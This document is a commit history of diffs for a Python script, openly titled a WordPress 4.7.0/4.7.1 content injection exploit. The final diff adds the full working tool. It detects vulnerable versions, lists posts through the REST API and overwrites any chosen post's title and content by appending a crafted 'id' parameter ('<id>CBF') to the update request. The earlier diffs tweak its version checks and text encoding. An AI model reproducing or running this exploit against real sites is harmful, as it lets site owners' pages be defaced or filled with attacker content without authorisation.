krlabs · August 25, 2022 16:37 · Feb 20, 2017 · Feb 16, 2017 · Feb 9, 2017 · Feb 3, 2017
diff --git a/wordpress_content_injection.py b/wordpress_content_injection.py
@@ -53,10 +53,9 @@ def main():
 		url = raw_input("[x] Enter the URL: ")
 		print("[?] Please wait ...\n")
 		wpcontent = WpContent(url)
-		wp_version = wpcontent.get_wp_version()
+		wp_version = wpcontent.get_wp_version().split()[0]
 		print("[x] Wordpress Version: {0} ".format(wp_version))
-		check = re.findall(r'[4].[7].[0-2]', wp_version)[0]
-		if(check == "4.7.0" or check == "4.7.1"):
+		if(wp_version == "4.7" or wp_version == "4.7.1"):
 			select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
 			while(select != "y" and select != "n"):
 				print("[x] Wrong selection! Try again.")
@@ -99,4 +98,4 @@ def main():
 			if cont == "n": break
 
 if __name__ == '__main__':
-	main()
+	main()
diff --git a/wordpress_content_injection.py b/wordpress_content_injection.py
@@ -5,9 +5,8 @@
 REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
 Wordpress Version Affected: 4.7.0/4.7.1
 
-Wordpress Content Injection Exploit - Coded by snoww0lf.
+2017 - Coded by snoww0lf.
 """
-
 import re
 import json
 import urllib2
@@ -34,7 +33,7 @@ def get_wp_post_information(self):
 		collected_information = ""
 		for load in load_info:
 			collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
-			format(load['id'], load['title']['rendered'], load['link'], load['content']['rendered'][:100])
+			format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
 		return collected_information
 
 	def inject_content(self, id_content, title, content):
@@ -57,7 +56,7 @@ def main():
 		wp_version = wpcontent.get_wp_version()
 		print("[x] Wordpress Version: {0} ".format(wp_version))
 		check = re.findall(r'[4].[7].[0-2]', wp_version)[0]
-		if(check == "4.7" or check == "4.7.1"):
+		if(check == "4.7.0" or check == "4.7.1"):
 			select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
 			while(select != "y" and select != "n"):
 				print("[x] Wrong selection! Try again.")
@@ -100,4 +99,4 @@ def main():
 			if cont == "n": break
 
 if __name__ == '__main__':
-	main()
+	main()
diff --git a/wordpress_content_injection.py b/wordpress_content_injection.py
@@ -22,7 +22,7 @@ def get_api_wp(self):
 
 	def get_wp_version(self):
 		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
-		if check_version == "4.7.0" or check_version == "4.7.1":
+		if check_version == "4.7" or check_version == "4.7.1":
 			check_version += " ( Maybe vulnerable to inject ) "
 		else:
 			check_version += " ( Maybe not vulnerable to inject ) "
@@ -57,7 +57,7 @@ def main():
 		wp_version = wpcontent.get_wp_version()
 		print("[x] Wordpress Version: {0} ".format(wp_version))
 		check = re.findall(r'[4].[7].[0-2]', wp_version)[0]
-		if(check == "4.7.0" or check == "4.7.1"):
+		if(check == "4.7" or check == "4.7.1"):
 			select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
 			while(select != "y" and select != "n"):
 				print("[x] Wrong selection! Try again.")

diff --git a/wordpress_content_injection.py b/wordpress_content_injection.py
@@ -0,0 +1,103 @@
+#! /usr/bin/env python
+
+"""
+Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
+REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
+Wordpress Version Affected: 4.7.0/4.7.1
+
+Wordpress Content Injection Exploit - Coded by snoww0lf.
+"""
+
+import re
+import json
+import urllib2
+
+class WpContent:
+	def __init__(self, url):
+		self.__url = url
+		self.__response = urllib2.urlopen(self.__url).read()
+
+	def get_api_wp(self):
+		return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]
+
+	def get_wp_version(self):
+		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
+		if check_version == "4.7.0" or check_version == "4.7.1":
+			check_version += " ( Maybe vulnerable to inject ) "
+		else:
+			check_version += " ( Maybe not vulnerable to inject ) "
+		return check_version
+
+	def get_wp_post_information(self):
+		get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
+		load_info = json.loads(get_post)
+		collected_information = ""
+		for load in load_info:
+			collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
+			format(load['id'], load['title']['rendered'], load['link'], load['content']['rendered'][:100])
+		return collected_information
+
+	def inject_content(self, id_content, title, content):
+		data = json.dumps({
+			'title':title,
+			'content':content
+			})
+		params = {'Content-Type':'application/json'}
+		full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
+		req = urllib2.Request(full_url, data, params)
+		resp = urllib2.urlopen(req).read()
+		return resp
+
+def main():
+	print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
+	while True:
+		url = raw_input("[x] Enter the URL: ")
+		print("[?] Please wait ...\n")
+		wpcontent = WpContent(url)
+		wp_version = wpcontent.get_wp_version()
+		print("[x] Wordpress Version: {0} ".format(wp_version))
+		check = re.findall(r'[4].[7].[0-2]', wp_version)[0]
+		if(check == "4.7.0" or check == "4.7.1"):
+			select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
+			while(select != "y" and select != "n"):
+				print("[x] Wrong selection! Try again.")
+				select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
+			print("\n")
+			if(select == "y"):
+				print("[x] Parsing data information, please wait ...\n")
+				wp_information = wpcontent.get_wp_post_information()
+				print(wp_information)
+				inp_id = input("[x] Enter ID Content that you want to overwrite: ")
+				inp_title = raw_input("[x] Change title: ")
+				print("\n")
+				print("=> 1. Load data from file.")
+				print("=> 2. Input data.")
+				print("\n")
+				mode = input("[x] Change content by [1/2] ? ")
+				if mode == 1:
+					dfile = raw_input("[x] Enter the filename: ")
+					with open(dfile, 'r') as f:
+						readf = f.readlines()
+					print("[x] Exploit in progress ...\n")
+					wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
+				else:
+					inp_data = raw_input("[?] Input data: ")
+					print("[x] Exploit in progress ...\n")
+					wpcontent.inject_content(inp_id, inp_title, inp_data)
+				print("[x] Update success!\n")
+				cont = raw_input("[?] Continue ? [y/n] ").lower()
+				while(cont != "y" and cont != "n"):
+					print("[x] Wrong selection! Try again.")
+					cont = raw_input("[?] Continue ? [y/n] ").lower()
+				if cont == "n": break
+			else:
+				break
+		else:
+			cont = raw_input("[?] Continue ? ").lower()
+			while(cont != "y" and cont != "n"):
+				print("[x] Wrong selection! Try again.")
+				cont = raw_input("[?] Continue ? ").lower()
+			if cont == "n": break
+
+if __name__ == '__main__':
+	main()
No results found